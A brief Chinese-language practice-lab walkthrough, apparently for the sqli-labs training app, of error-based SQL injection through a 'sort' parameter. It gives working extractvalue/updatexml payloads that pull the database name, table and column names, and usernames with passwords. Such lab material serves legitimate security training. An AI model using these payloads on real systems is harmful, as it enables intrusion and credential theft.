1.注入点测试:
进入按照提示输入sort
输入'后报错,说明存在注入点
2.判断字段数:
sort=3回显正常
sort=4,报错
说明有3个字段
2.1爆库
?sort=(extractvalue(1,concat(0x7e,(select database()),0x7e)))#
2.2爆表名
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)
2.3爆字段
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)
2.4爆数据
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)